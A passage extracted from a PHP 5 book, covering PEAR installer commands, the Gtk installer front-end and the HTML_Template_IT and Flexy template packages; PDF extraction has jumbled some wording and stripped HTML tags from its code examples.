called CSSML. ➥ XML_fo2pdf 0.98 Converts a xsl-fo file to pdf/ps/pcl ➥ text/etc with the help of apache-fop XML_HTMLSax 2.1.2 A SAX based parser for HTML and other ➥ badly formed XML documents XML_image2svg 0.1 Image to SVG conversion XML_NITF 1.0.0 Parse NITF documents. XML_Parser 1.1.0 1.1.0 XML parsing class based on PHP's bundled ➥ expat XML_RSS 0.9.2 RSS parser XML_SVG 0.0.3 XML_SVG API

    402 Gutmans_ch10 Page 374 Thursday, September 23, 2004 2:51 PM 374 Using PEAR Chap. 10 XML_Transformer 1.0.1 XML Transformations in PHP XML_Tree 1.1 Represent XML data in a tree structure XML_Util 0.5.2 0.5.2 XML utility class. XML_RPC 1.1.0 1.1.0 PHP implementation of the XML-RPC protocol ➥ The output is displayed in four columns: package name, latest version available online, locally installed version (or blank if you do not have that pack- age installed), and a short description. 10.6.10 pear remote-list This command displays a list of all packages and stable releases that are avail- able in the package repository: $ pear remote-list AVAILABLE PACKAGES: =================== PACKAGE VERSION APC 2.0.3 apd 0.4p2 Archive_Tar 1.1 Auth 1.2.3 Auth_HTTP 2.0 Auth_PrefManager 1.1.2 Auth_RADIUS 1.0.4 Auth_SASL 1.0.1 Benchmark 1.2.1 bz2 1.0 Cache 1.5.4 ... list-all is that The difference from only shows the last avail- remote-list able version, while also shows which releases you have installed. list-all preferred_state configuration setting, which This command obeys your . All the packages and releases in the output of the previous defaults to stable example are tagged as stable . You may temporarily set preferred_state for just one command. The fol- lowing example shows all packages that are of alpha quality or better: $ pear –d preferred_state=alpha remote-list AVAILABLE PACKAGES: =================== PACKAGE VERSION APC 2.0.3 apd 0.4p2 Archive_Tar 1.1 Archive_Zip 0 Auth 1.2.3 Auth_Enterprise 0 Auth_HTTP 2.1.0RC2 Auth_PrefManager 1.1.2

    403 Gutmans_ch10 Page 375 Thursday, September 23, 2004 2:51 PM 10.6 PEAR Commands 375 Auth_RADIUS 1.0.4 Auth_SASL 1.0.1 bcompiler 0.5 Benchmark 1.2.1 bz2 1.0 ... As you can see, some new packages showed up: Archive_Zip, and Auth_Enterprise (which did not have any releases at all at this point), and bcompiler 0.5. pear remote-info 10.6.11 To display detailed information about a package you have not installed, use the pear remote-info command. $ pear remote-info apc PACKAGE DETAILS: ================ Latest 2.0 Installed - no - Package APC License PHP Category Caching Summary Alternative PHP Cache Description APC is the Alternative PHP Cache. It was conceived of to provide a free, open, and robust framework for caching and optimizing PHP intermediate code. remote-info The package description shown by the command is taken from the newest release of the package. pear download 10.6.12 command does not store the package file it downloads any- The pear install where. If all you want is the package tarball (for installing later or something else), you can use the pear download command: $ pear download DB File DB-1.3.tgz downloaded (59332 bytes) By default, you will receive the latest release matching your configuration parameter. If you want to download a specific preferred_state release, give the full file name instead: $ pear download DB-1.2.tgz File DB-1.2.tgz downloaded (58090 bytes) Tip: -Z or If you don’t have the zlib PHP extension built in, use the --nocompress option to download .tar files.

    404 Gutmans_ch10 Page 376 Thursday, September 23, 2004 2:51 PM 376 Using PEAR Chap. 10 10.6.13 pear config-get As you have already seen, the pear config-get command is used to display a configuration parameter: pear config-get php_dir $ php_dir=/usr/share/pear If you do not specify a layer, the value is read from the first layer that default defines it (in the order user ). You may also specify a specific , system , configuration layer from where you want to get the value: $ pear config-get http_proxy system system.http_proxy=proxy.example.com:3128 pear config-set 10.6.14 command changes a configuration parameter: The pear config-set $ pear config-set preferred_state beta By default, the change is performed in the user configuration layer. You may specify the configuration layer with an additional parameter: pear config-set preferred_state beta system $ (You need write access to the system configuration file for this to have any effect.) 10.6.15 pear config-show command is used to display all configuration settings, The pear config-show config-get command. treating layers just like the $ pear config-show CONFIGURATION: ============== PEAR executables directory bin_dir /usr/local/bin PEAR documentation directory doc_dir /usr/local/lib/php/doc PHP extension directory ext_dir /usr/local/lib/php/ ➥ extensions/no-debug-non-zts-20040316 PEAR directory php_dir /usr/local/lib/php PEAR Installer cache directory cache_dir /tmp/pear/cache PEAR data directory data_dir /usr/local/lib/php/ data PHP CLI/CGI binary php_bin /usr/local/bin/php PEAR test directory test_dir /usr/local/lib/php/ test Cache TimeToLive cache_ttl 3600 Preferred Package State preferred_state stable Unix file mask umask 22 Debug Log Level verbose 1 HTTP Proxy Server Address http_proxy PEAR server master_server pear.php.net PEAR password (for password

    405 Gutmans_ch10 Page 377 Thursday, September 23, 2004 2:51 PM 10.6 PEAR Commands 377 maintainers) Signature Handling Program sig_bin /usr/bin/gpg Signature Key Directory sig_keydir /usr/local/etc/ pearkeys ➥ Signature Key Id sig_keyid Package Signature Type sig_type gpg PEAR username (for username maintainers) Tip: system ), you can view the con- By adding an extra parameter ( user or tents of a specific configuration layer. 10.6.16 Shortcuts Every command in the PEAR Installer may specify a command-line shortcut, to see them: just to save people from typing. Type pear help shortcuts pear help shortcuts $ Shortcuts: li login lo logout b build csh config-show cg config-get cs config-set ch config-help i install up upgrade ua upgrade-all un uninstall bun bundle p package pv package-validate cd cvsdiff ct cvstag rt run-tests pd package-dependencies si sign rpm makerpm l list st shell-test in info ri remote-info lu list-upgrades rl remote-list sp search la list-all d download cc clear-cache da download-all pear config-set foo=bar , you may type pear cs foo=bar , or Instead of pear pd instead of pear package-dependencies .

    406 Gutmans_ch10 Page 378 Thursday, September 23, 2004 2:51 PM 378 Using PEAR Chap. 10 NSTALLER F -E NDS 10.7 I RONT The PEAR Installer provides a front-end (user interface) API that is used to implement different types of user interfaces. 10.7.1 CLI (Command Line Interface) Installer The PEAR Command Line Interface installer runs in a terminal shell with human-readable text output. You have seen examples for this front-end from in the previous sections. 10.7.2 Gtk Installer Earlier, you learned that the PEAR Installer separated the user interface code into “front-ends.” So far, this chapter has presented only the CLI front-end; in this section, you glance at the Gtk (GNOME) front-end. Gtk is a graphical user interface toolkit that is common among Linux users. A Windows port exists as well, but this section focuses on the UNIX/ Linux environment. The PEAR Gtk front-end requires that you have php-gtk installed. For help installing php-gtk, refer to http://gtk.php.net/. PEAR_Frontend_Gtk After you set up php-gtk, install the package: $ pear install PEAR_Frontend_Gtk downloading PEAR_Frontend_Gtk-0.3.tgz ... ...done: 70,008 bytes install ok: PEAR_Frontend_Gtk 0.3 10.7.2.1 Now, fire up the Gtk installer with this command: Using the Gtk Installer $ pear –G The result should look like what is shown in Figure 10.3. Fig. 10.3 PEAR Gtk Installer Startup Screen.

    407 Gutmans_ch10 Page 379 Thursday, September 23, 2004 2:51 PM 10.7 Installer Front-Ends 379 On the left-hand side, you can navigate between the different parts of the installer. The one that is currently being displayed is the PEAR Installer . The package list pane to the right has four columns: Package, Installed, New, and pear list-all command, with the Summary. This is similar to the output of the addition of the Summary field. Also, notice how packages are grouped into cat- egory folders that you may collapse and expand. The Installed column says which version of the package you have already installed. If it is not installed, this field will be blank for that package. If you have it installed, an outline of a trashcan appears that you can click on to schedule an uninstall, and the version of the release you have. The New field is filled if a newer release is available or you don’t have the package, along with a checkbox that you can click to schedule the package for install or upgrade. But first, try clicking the Summary field for a package shown in Figure 10.4. Summary field for package. Fig. 10.4 This splits the package area in two and displays some information about the package you just selected. Click the X to make it go away. Cache_Lite by clicking the checkbox next to the version Now, let’s install number in the New column, and then click Download and Install > > in the lower-right corner, as shown in Figure 10.5.

    408 Gutmans_ch10 Page 380 Thursday, September 23, 2004 2:51 PM 380 Using PEAR Chap. 10 Cache_Lite package installed. Fig. 10.5 That’s all there is to it. It is worth noting that the Gtk front-end to the PEAR Installer uses the same code to perform installation and so on; it just provides another user interface. Let’s take a look at the Configuration part (click Configuration in the Navigation sidebar), as shown in Figure 10.6. Fig. 10.6 Configuring PEAR.

    409 Gutmans_ch10 Page 381 Thursday, September 23, 2004 2:51 PM 10.8 Summary 381 Just flip through the different configuration category tabs and take a look; the configuration parameters you see listed here are exactly the same ones that you learned about in the CLI version of the installer, just presented in a nicer way. UMMARY 10.8 S This chapter’s goal was to introduce the PEAR infrastructure and show you how to install packages for your own use. In the following chapter, you learn about some important packages and how to use them in your code.

    410 Gutmans_ch10 Page 382 Thursday, September 23, 2004 2:51 PM

    411 Gutmans_ch11 Page 383 Thursday, September 23, 2004 2:52 PM CHAPTER 11 Important PEAR Packages NTRODUCTION 11.1 I In this chapter, you see examples of some popular PEAR packages. This book does not have room for examples of every PEAR package, but this should at least give you an introduction. Q 11.2 D ATABASE UERIES See Chapter 6, “Databases with PHP 5,” for an introduction to PEAR DB. YSTEMS EMPLATE S 11.3 T are PHP components that let you separate application Template systems logic from display logic, and offer a simpler template format than PHP itself. It is ironic that PHP, which essentially started out as a template lan- guage, is used to implement template systems. But, there are good reasons for doing this besides the code/presentation separation, such as giving web designers a simpler markup format they can use in their page authoring tools, and developers greater control over page generation. For example, a template system can automatically translate text snippets to another language, or fill in a form with default values. A vast number of template systems are available for PHP. This is caused by the fact that along with database abstraction layers, template systems are one of the PHP components that arouse the strongest feelings and little will for compromise in developers. As a result, many people have written their own template system, resulting in a wonderful diversity and lack of standardiza- tion. 11.3.1 Template Terminology Before you dive into the various template systems, you may want to familiar- ize yourself with the template lingo (see Table 11.1). 383

    412 Gutmans_ch11 Page 384 Thursday, September 23, 2004 2:52 PM Important PEAR Packages Chap. 11 384 Template Glossary Table 11.1 Meaning Word Template The output blueprint; contains placeholders and blocks. Compile Transforming a template to PHP code. Placeholder Delimited string that is replaced during execution. Block or Part of a template that may be repeated with different data. Section HTML_Template_IT 11.3.2 The first PEAR template system you will familiarize yourself with is , or just IT . This is the most popular PEAR template package, HTML_Template_IT but it is also the slowest because it parses templates on every request and does not compile them into PHP code. The package provides an API that is compatible Tip: HTML_Template_Sigma with , but compiles templates into PHP code. HTML_Template_IT 11.3.2.1 Placeholder Syntax IT uses curly braces as placeholder delimiters, like this: 4 {PageTitle} This is the most common placeholder syntax, so chances are a template using only placeholders will actually work with different template packages. 11.3.2.2 Example: Basic IT Template This example is “Hello World” with HTML_Template_IT : loadTemplateFile('hello.tpl'); $tpl->setVariable('title', 'Hello, World!'); $tpl->setVariable('body', 'This is a test of HTML_Template_IT!'); $tpl->show(); HTML_Template_IT object, passing the template direc- First, you create an tory as a parameter. Next, the template file is loaded and some variables are set. The variable names correspond to placeholders in the template file, so the vari- {title} template placeholder is replaced with the value of the "title" able. Finally, the method does all the substitutions and displays the show() template output.

    413 Gutmans_ch11 Page 385 Thursday, September 23, 2004 2:52 PM 11.3 Template Systems 385 This template file is used in this example: {title}

    {title}

    {body}

    Figure 11.1 shows the result. Basic IT template output. Fig. 11.1 For blocks, IT uses HTML begin/end comments like 11.3.2.3 Block Syntax this:
  • {listitem} Blocks may be nested, but it is important that you start processing at the innermost block and work your way out. : 11.3.2.4 Example: IT With Blocks First, install HTML_Template_IT $ pear install HTML_Template_IT downloading HTML_Template_IT-1.1.tgz ... Starting to download HTML_Template_IT-1.1.tgz (18,563 bytes) ...done: 18,563 bytes install ok: HTML_Template_IT 1.1

    414 Gutmans_ch11 Page 386 Thursday, September 23, 2004 2:52 PM Important PEAR Packages Chap. 11 386 This example uses blocks to implement a simple -like loop in the foreach template: loadTemplateFile('it_list.tpl'); $tpl->setVariable('title', 'IT List Example'); foreach ($list_items as $item) { $tpl->setCurrentBlock("listentry"); $tpl->setVariable("entry_text", $item); $tpl->parseCurrentBlock("cell"); } $tpl->show(); setCur- This example sets up the IT object like the previous one, but calls rentBlock() setVariable() that specifies to which block the following call parseCurrentBlock() applies. When is called, the block is parsed, placeholders are substituted, and the result is buffered until the template is displayed. This is how the block template appears {title}

    {title}

    • {entry_text}
    (End of list) Figure 11.2 shows the results.

    415 Gutmans_ch11 Page 387 Thursday, September 23, 2004 2:52 PM 11.3 Template Systems 387 Fig. 11.2 IT with blocks output. Finally, IT lets you include other template files anywhere in your tem- plate, like this: In this block example, you could substitute the block contents with just HTML_Template_IT would include that file for every iteration an include tag, and of the block. By using includes carefully, you can structure your templates so you obtain reusable sub-templates. 11.3.3 HTML_Template_Flexy HTML_Template_Flexy The next template package is , or just . Even though Flexy pure placeholder templates written for IT will work out-of-the-box with Flexy, these two template packages are very different. First, Flexy operates on objects and object member variables instead of variables that are in turn stored in associative arrays as with IT. This is not a big difference in itself, but Flexy has the advantage that you can give it any object, of any class, and your template can access its public member variables. Here is a “Hello, World!” example 11.3.3.1 Example: Basic Flexy Template with Flexy:

    416 Gutmans_ch11 Page 388 Thursday, September 23, 2004 2:52 PM 388 Important PEAR Packages Chap. 11 $tpldir = 'templates'; $tpl = new HTML_Template_Flexy(array( 'templateDir' => 'templates', 'compileDir' => 'compiled', )); $tpl->compile('hello.tpl'); $view = new StdClass; $view->title = 'Hello, World!'; $view->body = 'This is a test of HTML_Template_Flexy'; $tpl->outputObject($view); A little more code is required to set up Flexy because you need to specify compile directory is both the template directory and compile directory. The where the compiled template files are stored. This directory must be writable by the web server. By default, the compile directory is relative to the template directory. template is compiled. You should notice that this is Next, the hello.tpl the same template as in the first IT example; this works because the template contains only two simple placeholders. Compilation is time-consuming, but is done only once or whenever the template file changes. As a result, you will notice that the first time you load this page, it takes a long time. Subsequent page loads are much faster. compileDir . When a template is compiled, the compiled version is placed in In the previous example, this is the “compiled” directory relative to the current directory. This directory must be writable by the web server, because templates will be compiled on demand by PHP when a user hits the page. Finally, an object holding view data is created and passed to the outputObject() method, which executes the template and prints the output. 11.3.3.2 Example: Flexy with Blocks This example corresponds to the “IT with Blocks” example: 'templates', 'compileDir' => 'compiled', )); $tpl->compile('flexy_list.tpl'); $view = new StdClass; $view->title = 'Flexy Foreach Example';

    417 Gutmans_ch11 Page 389 Thursday, September 23, 2004 2:52 PM 389 11.3 Template Systems $view->list_entries = array( 'Computer Science', 'Nuclear Physics', 'Rocket Science', ); $tpl->outputObject($view); This time, the template file is different because it is using more than just placeholders and is no longer compatible with IT: {title}

    {title}

      {foreach:list_entries,entry_text}
    • {entry_text} {end:}
    (End of list) If you compare the PHP code in this example with the corresponding IT example, you see that all the hassle of parsing blocks is gone. This is because the template is compiled; instead of dealing with flow-control on its own, Flexy leaves this to PHP’s executor. Look at the PHP file generated by the Flexy compiler: <?php echo htmlspecialchars($t->title);?>

    title);?>

      list_entries) || is_object($t ➥ >list_entries)) foreach($t->list_entries as $entry_text) {?>
    (End of list)

    418 Gutmans_ch11 Page 390 Thursday, September 23, 2004 2:52 PM Important PEAR Packages Chap. 11 390 So far, you have seen examples of placehold- 11.3.3.3 Flexy Markup Format construct in Flexy. Table 11.2 gives a full list of the con- ers and the {foreach:} structs that Flexy supports. Table 11.2 Flexy Markup Tags Description Tag {variable} This is the regular placeholder. By default, placeholders are htmlspecialchars() {variable:h} :h . The modifier disables this encoded by :u {variable:u} modifier encodes to pass the raw value through, while the urlencode() with instead. object and uses the return This tag calls a method in the {method()} view is used by value. As with variables, htmlspecialchars() {method():h} default, and you can use the :u :h {method():u} modifiers. and If {if:variable} statements are available, but only with Boolean tests no arbitrarily complex logic. s are limited to variables, method {if:method()} if calls, and negation. {if:!variable} {if:!method()} . else {else:} tag must be used with { If: } The and {end:} The . foreach: } { If: tag is used to finish both {end:} { } Corresponds to PHP’s {foreach:arr,val} foreach . The first variation iterates over {foreach:arr,ind, arr . The second and assigns each element in turn to val variation assigns the array index to ind val} as well. 11.3.3.4 Flexy HTML Attribute Handling One of the interesting things about Flexy is how it handles HTML/XML elements and attributes in the template. To give you an example, here is the last example again with the template changed to use a Flexy HTML/XML attribute for controlling a block: {title}

    {title}

    • {text}
    (End of list) {foreach:} The construct is gone; it is replaced by an attribute to the ele- . This looks a bit like XML namespaces, but it ment that is being repeated:
  • is not; the Flexy compiler removes the attribute during compila- flexy:foreach {foreach:} tion, and generates the same PHP code as the variant. The com- piled version of this template looks like this:

    419 Gutmans_ch11 Page 391 Thursday, September 23, 2004 2:52 PM 11.3 Template Systems 391 <?php echo htmlspecialchars($t->title);?>

    title);?>

      list_entries) || is_object($t- ➥ >list_entries)) foreach($t->list_entries as $entry_text) ➥ {?>
    (End of list) The XML/HTML attributes supported by Flexy are outlined in Table 11.3. Table 11.3 Flexy HTML/XML Attributes Description Attribute {if:} This is a simplified . The condition applies to the flexy:if="variable" XML/HTML element and its subelements, and there is no flexy:if="method()" flexy:if="!variable" {else:} . If the test is false, the current element and all its child elements are ignored. flexy:if="!method()" flexy:start="here" The flexy:start attribute can be used to ignore every- thing outside the current element. This is useful if you have sub-templates but still want to be able to view or edit them as complete HTML files. Similar to flexy:startchil- , but ignores everything to and flexy:start including the current element. dren="here" flexy:ignore="yes" Ignores the current element and all child elements. It’s useful to put mock-up data in templates that are edited with some visual web-design tool. Ignores all child elements, but not the current element. flexy:ignore- only="yes" Finally, Flexy can parse HTML form 11.3.3.5 Flexy HTML Element Handling elements and fill them in with correct data. This makes it easy to create a form template in some web-design tool without having to dissect the template before using it on your site. Flexy handles the following four HTML elements (see Table 11.4). Table 11.4 HTML Elements